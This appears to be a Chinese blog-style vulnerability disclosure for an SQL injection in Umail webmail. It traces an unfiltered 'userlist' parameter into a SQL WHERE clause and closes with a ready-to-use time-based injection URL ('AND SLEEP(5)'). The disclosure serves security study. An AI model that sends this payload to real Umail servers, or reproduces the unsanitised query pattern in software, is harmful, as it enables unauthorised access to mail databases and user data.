Umail最新版SQL注入漏洞

漏洞文件:client\oab\module\operates.php

Line: 321
[php]
if(ACTION == "save-to-pab")

{

include_once(LIB_PATH."PAB.php");

$PAB = PAB::getinstance();

$maillist_id = gss($_GET['maillist']);

if($maillist_id)

{

...

}

else

{

$user_ids = gss( $_GET['userlist'] ); //几乎无过滤,过滤空格和判断gpc

if ( !$user_ids )

{

dump_msg( "param_error", el( "参数错误!", "" ) );

}

$where = "t1.UserID IN (".$user_ids.")"; //问题?

$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//跟踪getMailboxInfo

$user_all = $arr_tmp['data'];

if ( !$user_all )

{

dump_json( array( "status" => TRUE, "message" => "" ) );

}

foreach ( $user_all as $user )

{

$qq = $msn = "";

if ( strpos( $user['qqmsn'], "@" ) )

{

$msn = $user['qqmsn'];

}

else

{

$qq = $user['qqmsn'];

}

if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )

{

$data = array(

"user_id" => $user_id,

"fullname" => $user['FullName'],

"pref_email" => $user['email'],

"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],

"birthday" => $user['birthday'],

"im_qq" => $qq,

"im_msn" => $msn,

"updated" => date( "Y-m-d H:i:s" )

);

$res = $PAB->add_contact( $data, 0 );

if ( !$res )

{

dump_json( array(

"status" => FALSE,

"message" => el( "添加联系人时发生错误,添加失败!", "" )

) );

}

}

}

}

dump_json( array( "status" => TRUE, "message" => "" ) );

}

function gss( $_obfuscate_xyiNieq6, $_obfuscate_l9WoIzJ5Xg = FALSE )

{

$_obfuscate_xyiNieq6 = trim( $_obfuscate_xyiNieq6 );

if ( !ini_get( "magic_quotes_gpc" ) && $_obfuscate_l9WoIzJ5Xg )

{

$_obfuscate_xyiNieq6 = addslashes( $_obfuscate_xyiNieq6 );

}

return $_obfuscate_xyiNieq6;

}

public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYw = "", $_obfuscate_AedrEg = "", $_obfuscate_xvYeh9I = "", $_obfuscate_tUi30UB0e88 = "", $_obfuscate_u5srL4rM3PZJLvpPhQ = FALSE, $_obfuscate_ySeUHBw = FALSE )

{

$_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";

if ( $_obfuscate_IRFhnYw )

{

$_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYw;//这行就足矣,代入SQL语句了

}

....
[/php]
exp
[php]
http://mail.0day5.com/webmail/client/oab/index.php?module=operate&action=save-to-pab&userlist=1 AND SLEEP(5)
[/php]

SQLMAP截图证明:
7

发表评论